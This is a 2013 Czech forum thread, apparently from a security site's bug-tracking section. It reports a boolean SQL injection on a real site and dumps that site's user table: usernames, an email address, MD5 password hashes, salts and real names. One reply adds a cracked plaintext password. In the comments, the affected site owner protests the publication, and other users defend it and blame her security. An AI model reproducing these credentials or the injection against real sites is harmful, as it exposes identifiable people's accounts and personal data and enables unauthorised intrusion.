| Boolean Based SQL Injection
[link] OR 17-7=10
data z artmuseumdb.user
username=zmikeska@trask.cz
password=a4d9d2d5a909c73067f13cf845c377a6
password_salt=Mulder
real_name=Zdenk Mikeska
username=martina
password=a5580c311bf5c94a2350f431f562aa16
password_salt=Martina
real_name=Martina Glenn
Asi bych to sem nedal, ale muj kompl narazi na problem, prehriva se graf. karta, tak si s tim md5 hash poradi nekdo jiny :D
(odpovědět) | | Kopr3tina | 87.98.250.* | 26.11.2013 1:47 |
|
|
|
| martina:foo73barMartina
----------
hack or be hacked :-) .. by greyhats
(odpovědět) | |
|
|
| Dobry den,
za jakym ucelem zverejnujete tyto udaje?
(odpovědět) | | Martina Glenn | 153.18.112.* | 4.12.2013 18:53 |
|
|
|
| Často je zveřejnění chyby na internetu jediný způsob, jak donutit správce k nápravě.
(odpovědět) | |
|
|
| A nebo motivovat bezohledneho hackera k vandalizaci prace ostatnich?
(odpovědět) | | Martina Glenn | 153.18.112.* | 4.12.2013 19:17 |
|
|
|
| Hacker není to, co si myslíte, takovému člověku se říká cracker. A o žádnou motivaci se nejedná, k čemu by někomu bylo zneužít chybu, kterou odhalil někdo jiný? Můžete si projít místní BugTrack. Jsem zvědavý, jestli najdete nějakou stránku, které je znetvořená kvůli zde zveřejněné chybě.
(odpovědět) | |
|
|
| Proc jste mne tedy na chybu neupozornil emailem? Moje jmeno i kontaktni email jsou na mem webu uvedeny, neukryvam se za zadnou anonymni prezdivku.
Co se tyce motivace vandalizovat, nechci polemizovat o tom, co k vandalizovani motivuje konkretni jedince. Vy sam muzete mit jiste eticke zasady, nicmene pochybuji, ze byste mohl zarucit stejne zasady u jakychkoliv ostatnich uzivatelu treba techto stranek.
(odpovědět) | | Martina Glenn | 153.18.112.* | 4.12.2013 20:03 |
|
|
|
| Já jsem chybu neobjevil, takže nevidím důvod, proč bych Vás zrovna já měl kontaktovat.
(odpovědět) | |
|
|
| Dobre, proc mne tedy nekontaktoval uzivatel, ktery tuto chybu objevil?
Pokud se Vas web zabyva osvetou v oblasti bezpecnosti internetu, rozhodne by pro Vasi image poskytovatele komunitniho vzdelavani bylo pozitivnejsi, kdybyste o chybach informovali primo vlastniky stranek nez bezmyslenkovite zverejnovali citlive udaje.
(odpovědět) | | Martina Glenn | 2601:9:5000:3fc:e54a:b7ce:931d:* | 4.12.2013 20:37 |
|
|
|
|
| Myslím si, že je to především VAŠE chyba, že tu jsou vaše "citlivé" údaje. Máte mít web lépe zabezpečený, to že na to kašlete je váš problém.
To že některý z uživatelů portálu Soom.cz objevil chybu neznamená, že jí MUSÍ oznámit správci webu!
Bugtrack- slouží pouze pro výukové účely, aby se ostatní méně zkušení naučili jak tyto chyby vyhledat, popřípadě konkrétní případy.
(odpovědět) | | Aloisík | 89.102.229.* | 5.12.2013 11:53 |
|
|
|
